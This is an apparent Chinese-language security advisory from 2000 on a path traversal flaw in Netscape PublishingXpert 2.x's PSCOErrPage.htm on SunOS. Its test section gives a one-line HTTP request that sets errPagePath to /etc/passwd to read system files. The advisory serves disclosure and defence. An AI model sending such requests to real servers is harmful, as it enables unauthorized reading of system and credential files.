发布日期：2000-04-11
更新日期：2000-04-11

受影响系统：

Netscape PublishingXpert 2.* PSCOErrPage.htm
+
  SunOS 5.7
  SunOS 5.6
  SunOS 5.5.1

描述：

---

PSCOErrPage.htm是一个用来显示错误新的页面，当服务器发生一个错误时，通常你会
被转到类似这样的一个链接地址去：


/PSUser/PSCOErrPage.htm?errPagePath=%2Fusr%2FPublishingXpert%2F2.5%2Fbin%2Fp
suser%2Fen%2Fcommon%2FPSCO_ErrPage.pat&errMsg=PUBSYS_35202%3A++The+two+passw
ords+provided+do+not+match
这里的%2F就是"/"，去掉errMsg变量的内容（它显示错误信息内容).就得到下面一个链接：

/PSUser/PSCOErrPage.htm?errPagePath=/usr/PublishingXpert/2.5/bin/psuser/en/c
ommon/PSCO_ErrPage.pat

errPagePath使用了绝对路径，因此攻击者可以改变errPagePath的路径，浏览系统文
件。(只能以web服务器的运行权限浏览)

<* 来源： \x00\x00 (x00x00x00@hotmail.com) *>



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

GET　/PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd　HTTP/1.0




建议：

---

临时解决方法：禁止使用PSCOErrPage.htm



浏览次数：7673
严重程度：0（网友投票）